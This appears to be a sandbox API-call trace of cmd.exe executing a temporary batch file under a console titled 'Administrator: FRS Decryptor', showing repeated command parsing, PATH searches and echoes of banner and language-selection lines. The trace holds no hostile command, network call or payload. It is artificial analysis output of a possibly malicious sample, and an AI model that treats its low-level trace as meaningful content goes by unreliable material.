[0068.911] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.912] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.912] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.912] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.912] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.912] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.912] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.912] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.912] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.912] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.912] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.912] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.912] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.912] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.912] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.912] SetErrorMode (uMode=0x0) returned 0x0 [0068.912] SetErrorMode (uMode=0x1) returned 0x0 [0068.912] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.912] SetErrorMode (uMode=0x0) returned 0x1 [0068.912] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.912] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.912] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.912] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.912] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.912] GetLastError () returned 0x2 [0068.912] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.912] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.913] GetLastError () returned 0x2 [0068.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.913] GetLastError () returned 0x2 [0068.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.913] GetLastError () returned 0x2 [0068.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.914] GetLastError () returned 0x2 [0068.914] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.915] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.915] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.915] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.915] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.915] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.915] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.915] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.915] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.915] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.915] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.915] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.915] GetFileType (hFile=0xc) returned 0x2 [0068.915] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.915] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.915] _get_osfhandle (_FileHandle=1) returned 0xc [0068.915] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x62) returned 1 [0068.916] _get_osfhandle (_FileHandle=1) returned 0xc [0068.916] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.916] _get_osfhandle (_FileHandle=1) returned 0xc [0068.916] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.916] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.916] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.917] SetConsoleInputExeNameW () returned 0x1 [0068.917] GetConsoleOutputCP () returned 0x1b5 [0068.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.917] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.918] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.918] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.918] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.918] SetFilePointer (in: hFile=0xa0, lDistanceToMove=519, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x207 [0068.918] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x207 [0068.918] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1bee, lpOverlapped=0x0) returned 1 [0068.918] SetFilePointer (in: hFile=0xa0, lDistanceToMove=526, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20e [0068.918] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=7, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo.\r\n _____________________________________________________________________________________________\r\n") returned 7 [0068.918] GetFileType (hFile=0xa0) returned 0x1 [0068.918] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.918] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20e [0068.918] _tell (_FileHandle=3) returned 526 [0068.919] _close (_FileHandle=3) returned 0 [0068.919] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.919] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.919] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.919] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.919] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.919] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.919] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.919] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.919] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.919] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.919] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.919] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.919] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.919] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.919] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.919] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.919] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.919] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.919] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.919] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.919] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.919] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.919] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.919] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.919] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.919] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.919] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.919] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.919] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.919] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.919] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.919] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.919] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.919] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.919] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.919] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.919] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.919] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.920] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.920] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.920] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.920] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.920] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.920] SetErrorMode (uMode=0x0) returned 0x0 [0068.920] SetErrorMode (uMode=0x1) returned 0x0 [0068.920] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.920] SetErrorMode (uMode=0x0) returned 0x1 [0068.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.920] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.920] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.920] GetLastError () returned 0x2 [0068.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.920] GetLastError () returned 0x2 [0068.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.921] GetLastError () returned 0x2 [0068.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.921] GetLastError () returned 0x2 [0068.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.922] GetLastError () returned 0x2 [0068.922] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.922] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.923] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.923] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.923] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.923] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.923] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.923] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.923] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.923] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.923] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.923] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.923] GetFileType (hFile=0xc) returned 0x2 [0068.923] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.923] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.923] _get_osfhandle (_FileHandle=1) returned 0xc [0068.923] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x2) returned 1 [0068.923] _get_osfhandle (_FileHandle=1) returned 0xc [0068.923] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.924] _get_osfhandle (_FileHandle=1) returned 0xc [0068.924] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.924] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.924] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.924] SetConsoleInputExeNameW () returned 0x1 [0068.924] GetConsoleOutputCP () returned 0x1b5 [0068.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.925] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.925] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.925] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.925] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.925] SetFilePointer (in: hFile=0xa0, lDistanceToMove=526, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20e [0068.925] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20e [0068.925] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1be7, lpOverlapped=0x0) returned 1 [0068.925] SetFilePointer (in: hFile=0xa0, lDistanceToMove=533, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x215 [0068.925] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=7, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo.\r\n _____________________________________________________________________________________________\r\n") returned 7 [0068.925] GetFileType (hFile=0xa0) returned 0x1 [0068.925] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.925] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x215 [0068.926] _tell (_FileHandle=3) returned 533 [0068.926] _close (_FileHandle=3) returned 0 [0068.926] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.926] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.926] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.926] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.926] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.926] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.926] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.926] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.926] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.926] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.926] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.926] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.926] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.926] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.926] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.926] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.926] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.926] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.926] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.926] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.926] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.926] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.926] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.926] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.926] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.926] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.926] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.927] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.927] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.927] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.927] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.928] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.928] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.928] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.928] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.928] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.928] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.928] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.928] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.928] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.928] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.928] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.928] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.928] SetErrorMode (uMode=0x0) returned 0x0 [0068.928] SetErrorMode (uMode=0x1) returned 0x0 [0068.928] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.928] SetErrorMode (uMode=0x0) returned 0x1 [0068.928] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.928] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.928] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.928] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.928] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.928] GetLastError () returned 0x2 [0068.928] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.929] GetLastError () returned 0x2 [0068.929] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.929] GetLastError () returned 0x2 [0068.929] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.929] GetLastError () returned 0x2 [0068.929] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.929] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.930] GetLastError () returned 0x2 [0068.930] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.931] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.931] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.931] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.931] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.931] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.931] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.931] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.931] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.931] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.931] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.931] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.931] GetFileType (hFile=0xc) returned 0x2 [0068.931] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.931] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.931] _get_osfhandle (_FileHandle=1) returned 0xc [0068.931] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x2) returned 1 [0068.932] _get_osfhandle (_FileHandle=1) returned 0xc [0068.932] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.932] _get_osfhandle (_FileHandle=1) returned 0xc [0068.932] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.932] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.932] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.933] SetConsoleInputExeNameW () returned 0x1 [0068.933] GetConsoleOutputCP () returned 0x1b5 [0068.933] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.933] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.933] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.933] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.933] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.933] SetFilePointer (in: hFile=0xa0, lDistanceToMove=533, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x215 [0068.934] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x215 [0068.934] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1be0, lpOverlapped=0x0) returned 1 [0068.934] SetFilePointer (in: hFile=0xa0, lDistanceToMove=582, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x246 [0068.934] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo. ╤í╘±─·╡─╙∩╤╘: Select your language: \r\n____________________________________________________\r\n") returned 49 [0068.934] GetFileType (hFile=0xa0) returned 0x1 [0068.934] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.934] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x246 [0068.934] _tell (_FileHandle=3) returned 582 [0068.934] _close (_FileHandle=3) returned 0 [0068.934] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 